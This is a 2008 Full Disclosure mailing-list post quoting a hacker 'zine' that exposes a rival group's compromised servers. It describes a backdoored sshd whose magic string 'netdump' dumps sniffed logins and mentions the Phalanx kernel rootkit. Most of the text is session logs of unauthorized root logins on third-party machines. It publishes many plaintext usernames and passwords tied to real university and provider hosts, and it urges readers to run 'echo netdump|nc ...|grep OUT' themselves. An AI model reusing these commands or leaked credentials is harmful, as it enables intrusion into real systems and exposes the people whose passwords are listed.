Full Disclosure mailing list archives

Re: x0x0x? its a joke!

From: "Robert Holgstad" <rholgstad () gmail com>
Date: Sun, 31 Aug 2008 13:14:09 -0500

you got owned by lamers, why do we care what you think or say?

also you complain that all they can do is use modified sshd versions and
that this makes them lame, but during your  'zine' this is all you are
doing. does this also make you 'lamer'?

On Sat, Aug 30, 2008 at 1:40 PM, bussinessinbox box <
bussinessinbox () gmail com> wrote:

SOMEONE OWNED IN http://labsec.elite.vc/x0x0x-exposed.txt


#                                                                                                                    #
#                    .____          ___.     _________                                                               #

#                    |    |   _____ \_ |__  /   _____/ ____   ____                                                   #
#                    |    |   \__  \ | __ \ \_____  \_/ __ \_/ ___\                                                  #

#                    |    |___ / __ \| \_\ \/        \  ___/\  \___                                                  #
#                    |_______ (____  /___  /_______  /\___  >\___  >                                                 #

#                            \/    \/    \/        \/     \/     \/                                                  #
#                    .___            .___              __         .__                                                #

#                    |   | ____    __| _/_ __  _______/  |________|__| ____   ______                                 #
#                    |   |/    \  / __ |  |  \/  ___/\   __\_  __ \  |/ __ \ /  ___/                                 #

#                    |   |   |  \/ /_/ |  |  /\___ \  |  |  |  | \/  \  ___/ \___ \                                  #
#                    |___|___|  /\____ |____//____  > |__|  |__|  |__|\___  >____  >                                 #

#                             \/      \/          \/                      \/     \/                                  #
#                                                                                                                    #

#                                                                                                                    #
#         - presents:                                                                                                #

#         \- x0x0x exposed -/                                                                                        #
#                                                                                                                    #

#                                                               #
#                                                               #

#        chapter one   : random lame stuff                      #
#        chapter two   : owned by yourself                      #
#        chapter three : download files/sniffs/stuff            #
#        chapter four  : conclusion                             #

#                   - x0x0x -                                   #
#                                                               #
#                                                               #
# - [V]endetta.                                                 #

#                                                               #

- <l> hello everyone !
- <l> the reason of this zine(which by teh way we dont like) is: vendetta >:)

- <l> we've got ourselfs owned around sep~2007 by the most lamer guys on brazil: r4t and his boyfriend skotch.(x0x0x)
- <l> now it's vendetta time !


#                                                               #
#                                                               #
#            _              _                                   #
#         __| |_  __ _ _ __| |_ ___ _ _   ___ _ _  ___          #

#        / _| ' \/ _` | '_ \  _/ -_) '_| / _ \ ' \/ -_)         #
#        \__|_||_\__,_| .__/\__\___|_|   \___/_||_\___|         #
#                      |_|                                      #

#                                                               #
#                                                               #

first of all, lets introduce x0x0x, the most pseudo-hackers of efnet: r47(r4t) and skotch(also known by s0l4r1s(nice 
nick btw))

[1]; http://archives.neohapsis.com/archives/fulldisclosure/2007-09/att-0178/x0x0x.txt
[2]; http://lasercomb.de/x0x0x2.txt

have you noticed how lame they are ?

all they can & will ever do is change your openssh version to a cracked one
and pray that the users will log into some kool server

and guess what, its NOT EVEN MADE by them ! - lets check it out -

central@labsec [~xoxox/openssh-4.7p1] # more skynet.h

                            ### #  ### ##   ###  ##  ### ###  ######  ######
                            ##  #   ## #     ##  ##   ##  #    ##    # # ## #

                            ####    ###       ####    ### #    ####     ##
                              ###   ####       ##     #####    ##       ##
                            #  ##   ## ##      ##     ## ##    ## ##    ##

                            ####   #### ##    ####   ### ##   ######   ####

                                        - V E R S I O N  1. 0 -
                                             coded by fmrj

  - Logs SSH, SCP, SFTP, SSHD and ip / hostname
  - ftp logger included (netkit-ftp)
  - Encrypted sniffer logs
  - SSH, SCP, SFTP will not log you
  - compile script (see compile.sh)

  - rootlogin is permitted even though remoterootlogin is set to no
  - Will not log to syslog, utmp, wtmp or lastlog
  - If MAGIC_VERSION is NOT undeclared:
    telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in.

    (WARNING: telnet does NOT encrypt like SSH, so this would be visible with tcpdump)
    Also this will NOT get logged by syslog

  Future features:
  - pid hiding
  - More encryption / better sniffer encryption (thought of rc-crypt)

  - strace will show that ssh is logging, make it so that if ssh is being ptrace'd it will not log
  - Have a cool PS1 for the bd
  - Write a ssh client that can:
    -> Connect and dump logs so you dont have to use telnet approach (encrypted)

    -> That can do connect-chain (ssh -bounce box1 box2 box3)

  If you have this, it either means we are friends or someone gave it to you, if so
  I would like this bd to be kept as private as possible, so please dont pass it on

  I would also appreciate suggestions / ideas / help / whatever for future features
  aim: fmrj09

  - Thanks *


- then there is some shit aion code which is public @ packetstorm -
- their kool sshd backdoor kan be found in the end of thiz zine   -

- dont forget to check the gr8 shellscript skotch made            -

################################## leTz hIghTlIghT 50m3th1n6 #############################
    telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in.

################################## LETS HIGHLIGHT SOMETHING #############################

ohhhhhhwwwwwwww. k00l 3n0ugh !
and gu355 wh47 ?
th3y u53 th3 s4m3 m4g1c_v3r510n 1n 4ll th31r k00l l4m3 53rv3r5 !

*thinks* is that a deja-vu or something ? i could swear that x0x0x wrote something about it in our zine ! *thinks*

central@labsec [~xoxox/openssh-4.7p1] # grep -i magic_version skotch.h
#define MAGIC_VERSION         "netdump"

----- th4nk5 8uddY ------
----- end of lame sshd backdor ----

***************** phalanx the gr8 kernel rootkit ***************

7h475 r1gh7. l4m3 55hD b4ckd00R wasnT ENouGH !
whAT ELsE Do thEY USE ?

PHALANX ! THE gr8 prIv8 kERn3l r007k17
get your own at http://packetstormsecurity.org/UNIX/penetration/rootkits/phalanx-b6.tar.bz2

* attached their k00l phalanx in the bottom of the zine *

***************** phalanx the gr8 kernel rootkit ***************

------ funny stuff:

while looking at their boxes, we felt so disappointed that they cant even write the right sshd version..

[]     : SSH-2.0-p2-FC-4.3
[]   : SSH-2.0-OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
[]    : SSH-2.0-OenSSH_4.2

[]: SSH-2.0-p1 Debian-5ubuntu0.5
[]  : SSH-1.99-p1
[]   : SSH-2.0-p1 Debian-8ubuntu1.2

[]   : SSH-1.99-p1

you must be asking yourself.. wtf? they cant even copy&paste the right sshd version, how do they own so many servers?
answer: bad system admins. doing a easy md5 checksum on ssh/sshd binaries would do the trick. they dont even check 
their sshd banners.

[[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]
they suck. they beg for someone to code them some lame kernel rootkit (phalanx) and sshd backdoor which is... around 
~90's ? we no longer use them, k ?

they blame us about using the same password, what about thei magic_password ? kool, they use the 'netdump' on all 
their boxes,
which is the reason for the chapter two.
[[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]

#                                                               #
#            __             __            __                    #
#       ____/ /  ___ ____  / /____ ____  / /__    _____         #

#      / __/ _ \/ _ `/ _ \/ __/ -_) __/ / __/ |/|/ / _ \        #
#      \__/_//_/\_,_/ .__/\__/\__/_/    \__/|__,__/\___/        #
#                  /_/                                          #
#                                                               #

#                                                               #

; thiZ iZ WhErE wE StaRT tO SHoW ThEiR kOoL & niCe laMe ServeRS
; 90% oF thEm, thEY Got ThRU SsH SNiFfER WHiCh Is Not KoOL

; and 10% oF thEM, thEY gOT thRu SsHbRutEfoRce WhicH iZ VErY koOl
; thAnkZ agAIN MaGiC_vERSIoN ANd ThAnks foR BeInG DuMbER thAn wE usEd to BE

central@labsec [~xoxox/h3h3] # telnet 22

Connected to (
Escape character is '^]'.
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> r3m3mb3r 

SSH2_OUT:     user: root      pass: R4tD33Gl  (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> thanks for 
ssh localhost dewd

- cut-

******************** th4nk5 f0r 7h3 p455w0rd 7hRu y0uR 0w|\| |_4m3 5n1ff3r, 455h0l3 ********************
central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

Last login: Fri Aug  8 16:27:40 2008 from

                            **** Connected to ****

               ### #  ### ##   ###  ##  ### ###  ######  ######
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #
               ####    ###       ####    ### #    ####     ##
                 ###   ####       ##     #####    ##       ##

               #  ##   ## ##      ##     ## ##    ## ##    ##
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux servnet 2.6.18-4-486 i686 ****


root@servnet:~# uname -a;/sbin/ifconfig -a|grep inet
Linux servnet 2.6.18-4-486 #1 Wed Apr 18 09:13:09 UTC 2007 i686 GNU/Linux
          inet addr:  Bcast:  Mask:

root@servnet:~# last -1 root
root     pts/2    Fri Aug  8 16:27 - 16:32  (00:04) domain name pointer bd04a1de.virtua.com.br.

******************** 1 w0nd3r h0w 0ld 55h brut3f0rc3 1z ********************

central@labsec [~xoxox/h3h3] # telnet 22
Connected to
Escape character is '^]'.

netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> you have no 
idea how kool you are

SSH2_OUT:     user: root      pass: buCeTTT   (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, thanks.

pass_from:       user: root      pass: salinarsalinar    (x2.sprintdns.net) -->>>>>>>>>> i hope you 
guys change the passwd real quick :)

central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

Last login: Sun Aug 10 12:17:11 2008 from 97.139.broadband2.iol.cz

                            **** Connected to ****

               ### #  ### ##   ###  ##  ### ###  ######  ######
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #
               ####    ###       ####    ### #    ####     ##

                 ###   ####       ##     #####    ##       ##
               #  ##   ## ##      ##     ## ##    ## ##    ##
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux x1 2.6.18-6-686 i686 ****

root@x1:~# uname -a;w;last -1 root
Linux x1 2.6.18-6-686 #1 SMP Sat May 24 10:24:42 UTC 2008 i686 GNU/Linux
 08:24:44 up 9 days, 14:48,  0 users,  load average: 0.17, 0.11, 0.09
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT

root     pts/0        97.139.broadband Sun Aug 10 12:17 - 12:38  (00:20)
root@x1:~# ifconfig -a|grep inet
          inet addr:  Bcast:  Mask:


central@labsec [~xoxox/h3h3] #  telnet 22

Connected to
Escape character is '^]'.
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> hi. im a 
pseudo hacker

SSH2_OUT:     user: root      pass: DiVRuu    (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> ok, get in.

central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

Last login: Mon Aug 11 13:00:20 2008 from ppp85-140-31-214.pppoe.mtu-net.ru

                            **** Connected to ****

               ### #  ### ##   ###  ##  ### ###  ######  ######
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #
               ####    ###       ####    ### #    ####     ##

                 ###   ####       ##     #####    ##       ##
               #  ##   ## ##      ##     ## ##    ## ##    ##
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux localhost 2.6.24-gentoo-r3 i686 ****

localhost ~ #
localhost ~ # uname -a;w;last -1 root;/sbin/ifconfig -a|grep inet
Linux localhost 2.6.24-gentoo-r3 #3 SMP Mon Apr 7 18:52:13 Local time zone must be set--see zic m i686 Intel(R) 
Core(TM)2 Duo CPU     E4500  @ 2.20GHz GenuineIntel GNU/Linux

 10:30:35 up 1 day, 22:21,  0 users,  load average: 0.15, 0.12, 0.09
root     pts/1        ppp85-140-31-214 Mon Aug 11 13:00 - 13:07  (00:06)

wtmp begins Mon Mar 31 21:49:08 2008

          inet addr:  Bcast:  Mask:


central@labsec [~xoxox/h3h3] # telnet 22
Connected to
Escape character is '^]'.

netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> y0, im leet.
pam_from:         user: root      pass: w22662s   (d91-128-212-13.cust.tele2.at) ---->>>> no localhost 
this time(yay!) but it works.

central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

root@BHC2:/usr/local# uname -a;w;/sbin/ifconfig -a|grep inet

Linux BHC2 2.6.15 #7 SMP PREEMPT Sun Feb 19 23:35:17 CET 2006 i686 GNU/Linux
 08:34:52 up 42 days, 19:58,  3 users,  load average: 0,91, 1,05, 1,07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT

root     pts/39   chello0841120232 Sat00    3days  0.93s  0.89s mc
root     pts/5    chello0841120232 Fri09    2days  0.01s  0.01s -bash
root     pts/7    chello0841120232 Fri23    2days  1:20   1:20  mc
          inet Adresse:  Bcast:  Maske:


central@labsec [~xoxox/h3h3] # telnet 22

Connected to
Escape character is '^]'.
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> there i am.

SSH2_OUT:     user: joeb      pass: xaoAs..   (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> sup joeb

pass_from:        user: joeb      pass: milegyen  (78-131-80-171.pool.hdsnet.hu)        > better be 
changing that by now.

SSH2_OUT:         user: joeb      pass: megistudom        (78-131-80-171.pool.hdsnet.hu)> better be 
changing that by now.

SSH2_OUT:        user: joeb      pass: valami    (dsl54027E9A.pool.t-online.hu)        > better be 
changing that by now.

central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

Last login: Wed Aug 13 08:29:00 2008 from 78-131-80-171.pool.hdsnet.hu

                            **** Connected to ****

               ### #  ### ##   ###  ##  ### ###  ######  ######
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #
               ####    ###       ####    ### #    ####     ##

                 ###   ####       ##     #####    ##       ##
               #  ##   ## ##      ##     ## ##    ## ##    ##
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux maszat 2.6.18-6-686-bigmem i686 ****

root@maszat:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux maszat 2.6.18-6-686-bigmem #1 SMP Fri Jun 6 23:31:15 UTC 2008 i686 GNU/Linux
 08:41:36 up 25 days, 16:08,  0 users,  load average: 0.19, 0.15, 0.05

USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:  Bcast:  Mask:

          inet6 addr: 2001:738:2001:2072:207:e9ff:fe24:4236/64 Scope:Global


central@labsec [~xoxox/h3h3] # telnet 22
Connected to
Escape character is '^]'.

netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> afterall, why 
netdump ?

SSH2_OUT:     user: root      pass: NjKeyJ    (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> hello sw337Y.

pass_from:        user: dreameye  pass: ii1945    (ropas.snu.ac.kr)  ------>>>>>>>>>>>>>> sorry 
koreans, nothing personal.

pass_from:       user: dk        pass: 0ghafjs                      ------>>>>>>>>>>>>>> i mean, 
personal with you, you no.

central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

Last login: Thu Aug  7 03:35:51 2008 from ropas.snu.ac.kr

                            **** Connected to ****

               ### #  ### ##   ###  ##  ### ###  ######  ######
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #
               ####    ###       ####    ### #    ####     ##

                 ###   ####       ##     #####    ##       ##
               #  ##   ## ##      ##     ## ##    ## ##    ##
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux abs 2.6.24-19-server i686 ****

root@abs:~# uname -a;w;/sbin/ifconfig -a|grep inet;last -1 dreameye
Linux abs 2.6.24-19-server #1 SMP Sat Jul 12 00:40:01 UTC 2008 i686 GNU/Linux
 15:49:37 up 8 days,  1:53,  0 users,  load average: 0.00, 0.00, 0.00

USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:  Bcast:  Mask:

          inet6 addr: fe80::20e:e8ff:fef8:8760/64 Scope:Link
          inet addr:  Mask:
          inet6 addr: ::1/128 Scope:Host
dreameye pts/0        ropas.snu.ac.kr  Thu Aug  7 03:35 - 03:36  (00:00)


central@labsec [~xoxox/h3h3] # telnet 8022       ----- same applies for (another dumbox 
on the network)

Connected to
Escape character is '^]'.
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> has it 
something to do with my netdump user?

pass_from:      user: root      pass: m4c4c0z3e1        (tradestation231.eum.intranet)> hello m0nk3y

central@labsec [~xoxox/h3h3] # ssh root@ -p 8022
root@'s password:

******* no skynet thiz timE *********** h3h3h3h3 ***********

Last login: Mon Aug 11 21:48:01 2008 from tradestation231.eum.intranet

root@eumisrvgw2:/usr/local/temp# uname -a;w;/sbin/ifconfig -a|grep inet
Linux eumisrvgw2 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux
 03:18:45 up 24 days,  9:43,  0 users,  load average: 0.01, 0.03, 0.00

USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:  Bcast:  Mask:

          inet6 addr: fe80::219:bbff:fec6:82b6/64 Scope:Link
          inet addr:  Bcast:  Mask:

          inet addr:  Bcast:  Mask:
          inet6 addr: fe80::219:bbff:fec6:82b7/64 Scope:Link

          inet addr:  Bcast:  Mask:

root@eumisrvgw2:~# last -10 root|grep 189\.4

root     pts/0    Mon Aug 11 14:24 - 14:44  (00:19)   ----------------------->>>>> i wonder who 
that kool ip iz.
                                                                           ----------------------->>>>> bruteforce 
again? what a zhame !


central@labsec [~xoxox/h3h3] # telnet 22

Connected to
Escape character is '^]'.
SSH2_OUT:     user: root      pass: vEcTrrA   (localhost)

central@labsec [~xoxox/h3h3] # ssh root@ -p 8022
root@'s password:

root@ssh1:~# uname -a;uptime;/sbin/ifconfig -a|grep inet

Linux ssh1 2.6.22-4-k7 #1 SMP Tue Feb 12 17:54:42 UTC 2008 i686 GNU/Linux
 04:38:02 up 54 days,  1:50, 17 users,  load average: 0.05, 0.01, 0.00
root@ssh1:~# ./sheader /usr/include/linux/mac.h|sort|uniq|grep OUT      ------------>> this is their default sniffer 

SSH2_OUT:    user: lourenco  pass: LiNuX0527         (didi.if.uff.int)
SSH2_OUT:    user: lourenco  pass: LiNuXS0527        (didi.if.uff.int)

SSH2_OUT:    user: nuno      pass: surfar    (catuaba.if.uff.int)
SSH2_OUT:    user: lourenco  pass: LiNuX0527         (cerbero4.if.uff.int)

SSH2_OUT:    user: critter   pass: 559832    (ronaldinho.if.uff.int)
SSH2_OUT:    user: davidvaz  pass: 2o3145    (barabasi.if.uff.int)

SSH2_OUT:    user: lubian    pass: 15862jLr  (lip-serverI.if.uff.int)
SSH2_OUT:    user: mcosta    pass: 950205    (nano3.if.uff.int)

SSH2_OUT:    user: asa       pass: gabixande2        (nanodc01.if.uff.int)
SSH2_OUT:    user: mcosta    pass: 950205    (nanodc01.if.uff.int)

SSH2_OUT:    user: thiagofts         pass: 8vacagk   (Owner-PC.if.uff.int)
SSH2_OUT:    user: alanfr    pass: ck37=2x   (ltspsrvr.if.uff.int)

SSH2_OUT:    user: curso     pass: curso     (ltspsrvr.if.uff.int)
SSH2_OUT:    user: help      pass: slacksucks!       (ltspsrvr.if.uff.int)

SSH2_OUT:    user: opeador   pass: slacksucks!       (ltspsrvr.if.uff.int)
SSH2_OUT:    user: operador  pass: slacksucks!       (ltspsrvr.if.uff.int)

SSH2_OUT:    user: orahcio   pass: wulto12   (viagra.if.uff.int)
SSH2_OUT:    user: nuno      pass: surfar    (catuaba.if.uff.int)

SSH2_OUT:    user: asa       pass: gabixande2        (nano2.if.uff.int)
SSH2_OUT:    user: isidoro   pass: VU4R9C    (zico.if.uff.int)

SSH2_OUT:      user: isidoro   pass: VU4R9C
SSH2_OUT:    user: davidvaz  pass: 2o3145    (homer.if.uff.int)

SSH2_OUT:    user: davidvaz  pass: o3145     (homer.if.uff.int)
SSH2_OUT:    user: tgmattos  pass: CAMtgm&7  (homer.if.uff.int)

SSH2_OUT:    user: asa       pass: gabixande2        (cerbero7.if.uff.int)
SSH2_OUT:    user: lourenco  pass: LiNuX0527         (cerbero7.if.uff.int)

SSH2_OUT:    user: lourenco  pass: LiNuX05427        (cerbero7.if.uff.int)
SSH2_OUT:    user: dionizio  pass: Zoedoulos         (cerbero9.if.uff.int)

SSH2_OUT:    user: lourenco  pass: LiNuX0527         (cerbero9.if.uff.int)
SSH2_OUT:    user: lourenco  pass: LiNuX0527         (romario.if.uff.int)

SSH2_OUT:    user: lourenco  pass: LiNuX527  (romario.if.uff.int)
SSH2_OUT:    user: dionizio  pass: Zoedoulos         (cerbero10.if.uff.int)

SSH2_OUT:    user: lourenco  pass: LiNuX0527         (cerbero10.if.uff.int)
SSH2_OUT:    user: lourenco  pass: exit      (cerbero10.if.uff.int)

SSH2_OUT:    user: jssm      pass: Jujaja    (complex000.if.uff.int)
SSH2_OUT:    user: nuno      pass: surfar    (complex000.if.uff.int)

SSH2_OUT:    user: pmco      pass: druida99  (complex000.if.uff.int)
SSH2_OUT:    user: alan      pass: ck37=2x

SSH2_OUT:    user: root      pass: slacksucks!
SSH2_OUT:    user: root      pass: slacksucks!       (urania.if.uff.int)

SSH2_OUT:    user: bernardo  pass:   (damasco.if.uff.int)
SSH2_OUT:    user: bernardo  pass: truthno1  (damasco.if.uff.int)

SSH2_OUT:    user: jssm      pass: Jujaja    (gould.if.uff.int)
SSH2_OUT:     user: tgmattos  pass: CAMtgm&7

SSH2_OUT:     user: fsilveira         pass: Instituto
SSH2_OUT:     user: fsilveira         pass: VaiPasSar
SSH2_OUT:     user: davidvaz  pass: 2o3145    (DOAS-Laptop.if.uff.int)

SSH2_OUT:     user: alan      pass: ck37=2x   (urania.if.uff.int)
SSH2_OUT:     user: pmco      pass: druida99  (urubu.if.uff.int)

SSH2_OUT:     user: pmco      pass: druidruida99      (urubu.if.uff.int)
SSH2_OUT:     user: critter   pass: 559832    (ronaldinho.if.uff.int)


central@labsec [~xoxox/h3h3] # telnet 22

Connected to
Escape character is '^]'.
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> letmein

pass_from:         user: root      pass: @pixar87  (dsl-58-7-216-153.wa.westnet.com.au) -> h3h3, sorry 

central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

----- no skynet -------

Last login: Tue Aug 12 19:32:36 2008 from dsl-58-7-216-153.wa.westnet.com.au

zeus:/usr/include/linux# uname -a;w;/sbin/ifconfig -a|grep inet
Linux zeus 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
 15:27:04 up 104 days,  6:19,  1 user,  load average: 0.00, 0.02, 0.00

USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:  Bcast:  Mask:

          inet6 addr: fe80::209:3dff:fe12:67e8/64 Scope:Link
          inet addr:  Bcast:  Mask:

zeus:/usr/include/linux# ./sheader /usr/include/linux/byteorder/ssh.h|sort|uniq|more
SSH2_OUT:   user: michael   pass: @pixar87
SSH2_OUT:   user: michael   pass: dh0st1ngd

SSH2_OUT:   user: michael   pass: ruup2it
SSH2_OUT:   user: root      pass: @pixar87
SSH2_OUT:    user: admin     pass: @pixar87

SSH2_OUT:    user: admin     pass: emaildivers
SSH2_OUT:    user: admin     pass: jugg3r0
SSH2_OUT:    user: root      pass: @pixar887

SSH2_OUT:    user: root      pass: jugg3r0
pass_from:         user: root      pass: @pixar87


central@labsec [~xoxox/h3h3] # telnet 22
Connected to
Escape character is '^]'.

netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> smack
pass_from:        user: root      pass: cl1pt3xt  (c-24-218-192-76.hsd1.ma.comcast.net)-> sorry bro

pass_from:         user: gman      pass: 0xc0ffee  (c-75-68-31-152.hsd1.nh.comcast.net) -> >:(

central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

Last login: Wed Aug  6 23:25:38 2008 from              --------->>>>>>>>>>>>>>>>>>>>>>>>> quick 
question, who's that ?

                                                                     --------->>>>>>>>>>>>>>>>>>>>>>>>> doesn't that 
make you sad? i mean, wtf...

d4:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux d4 2.6.25-2-686 #1 SMP Tue May 27 15:38:35 UTC 2008 i686 GNU/Linux
 03:36:51 up 68 days,  4:58,  0 user,  load average: 1.88, 1.80, 1.74
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT

          inet addr:  Bcast:  Mask:
          inet6 addr: fe80::209:6bff:fe8c:e58/64 Scope:Link


central@labsec [~xoxox/h3h3] # telnet 22

Connected to
Escape character is '^]'.
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> i DEMAND THE 

SSH2_OUT:     user: root      pass: x4rtuhg6  (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, i missed 
you, localhost.

pass_from: ::ffff:  user: root      pass: dihlordifenil  --------->>>>>>>>>>>>>>>>>>>>>>>>> h3h3 >;(

central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

Last login: Fri Aug  8 19:49:52 2008 from              ------------>>>>>>>>>>>>>> lets laugh for a 
while now

                            **** Connected to ****

               ### #  ### ##   ###  ##  ### ###  ######  ######
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #
               ####    ###       ####    ### #    ####     ##

                 ###   ####       ##     #####    ##       ##
               #  ##   ## ##      ##     ## ##    ## ##    ##
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux users 2.6.23-gentoo i686 ****

root@users:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux users 2.6.23-gentoo #4 SMP PREEMPT Fri Dec 14 19:43:35 EET 2007 i686 Intel(R) Xeon(TM) CPU 3.00GHz GenuineIntel 
 10:49:08 up 171 days, 22:37,  1 user,  load average: 0.20, 0.24, 0.21

root     pts/0     10:46    0.00s  0.44s  0.00s w
          inet addr:  Bcast:  Mask:

          inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
          inet addr:  Bcast:  Mask:

          inet addr:  Mask:
          inet6 addr: ::1/128 Scope:Host
          inet addr:  Bcast:  Mask:

          inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
          inet addr:  Bcast:  Mask:

          inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link


central@labsec [~xoxox/h3h3] # telnet 22
Connected to
Escape character is '^]'.

netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> im getting 
tired of this.

pam_from:        user: root      pass: QWERFcxz  (mail2.tikalnetworks.com) ----->>>>>>>> no kidding.

central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

jessica temp # uname -a;w;/sbin/ifconfig -a|grep inet

Linux jessica 2.6.17-gentoo-r7 #3 Sun Sep 3 11:17:41 IDT 2006 i686 Intel(R) Celeron(R) CPU 2.66GHz GenuineIntel 
 09:58:11 up 3 days, 18:03,  1 user,  load average: 1.29, 1.16, 1.08

root     pts/0     09:34   16:19   0.32s  0.30s ssh
          inet addr:  Bcast:  Mask:

          inet addr:  Mask:


central@labsec [~xoxox/h3h3] # echo netdump|nc 22|grep OUT
SSH2_OUT:        user: wlscopel  pass: va1513zb  (feynman.if.usp.br)

SSH2_OUT:       user: pdborges  pass: mipa0529  (aegir.if.usp.br)
SSH2_OUT:        user: luana     pass: 103174b   (athenas.cna.unicamp.br)

SSH2_OUT:         user: kpp       pass: fth6mdy   (landauer.if.usp.br)
SSH2_OUT:        user: luana     pass: 103174b   (schroedinger.if.usp.br)

SSH2_OUT:        user: mvarella  pass: CH3Ftri   (planck.if.usp.br)
SSH2_OUT:        user: wlscopel  pass: va1513zb  (feynman.if.usp.br)

SSH2_OUT:        user: cedric    pass: KunD1cka  (schroedinger.if.usp.br)

central@labsec [~xoxox/h3h3] # echo netdump|nc 22|grep from|grep -v bullshit

pass_from:      user: hmf18     pass: xpx9b15+  (turista.if.usp.br)
pass_from:       user: cedric    pass: P1chona04         (c934da9c.virtua.com.br)

pass_from:       user: mfsoares  pass: 3p1t@xy   (c95269d5.virtua.com.br)
pass_from:        user: kpp       pass: mdc6gpt   (bd2258d1.virtua.com.br)

pass_from:       user: pontes    pass: r@s&09*   (bd6613a7.virtua.com.br)
pass_from:       user: lassali   pass: las2008ro         (bd66627e.virtua.com.br)

central@labsec [~xoxox/h3h3] # ssh root@ 'uname -a'
root@'s password:

Linux romeo 2.6.5-7.286-smp #1 SMP Thu May 31 10:12:58 UTC 2007 x86_64 x86_64 x86_64 GNU/Linux


central@labsec [~xoxox/h3h3] # telnet 22

Connected to shark.lcca.usp.br (
Escape character is '^]'.
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> k from now 
on, no more netdump messages

SSH2_OUT:     user: root      pass: UspNNNNd  (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> just got 
tired, u knoW

SSH2_OUT:     user: amazonas  pass: UspNNNNd  (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> anyway im 
almost stopping pasting stuff

-> alot of kool shit regarding usp.br here
try yourself-> echo netdump|nc 22|grep usp.br
or just grep OUT



central@labsec [~xoxox/h3h3] # echo netdump|nc 22|grep localhost

SSH2_OUT:     user: root      pass: ArmY1*00  (localhost)        ->>>>>>>>>>>>>>>>> im glad you are here :) 
kind of makes it easy

central@labsec [~xoxox/h3h3] # ssh root@
root@'s password:

Last login: Thu Jul 31 09:30:33 2008 from nemo.df.ibilce.unesp.br

                            **** Connected to ****

               ### #  ### ##   ###  ##  ### ###  ######  ######
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #
               ####    ###       ####    ### #    ####     ##

                 ###   ####       ##     #####    ##       ##
               #  ##   ## ##      ##     ## ##    ## ##    ##
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux hobbes 2.6.18-6-686 i686 ****

root@hobbes:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux hobbes 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux
 05:47:44 up 27 days, 15:12,  1 user,  load average: 0.21, 0.15, 0.06

USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
rico     :0       -                06Aug08 ?xdm?   5:39   0.71s x-session-manager
          inet addr:  Bcast:  Mask:

          inet6 addr: fe80::2e0:7dff:fed7:f778/64 Scope:Link
          inet addr:  Mask:
          inet6 addr: ::1/128 Scope:Host

central@labsec [~xoxox/h3h3] # echo netdump|nc 22|grep unesp
pass_from:       user: rico      pass: so31fia12         (nemo.df.ibilce.unesp.br)

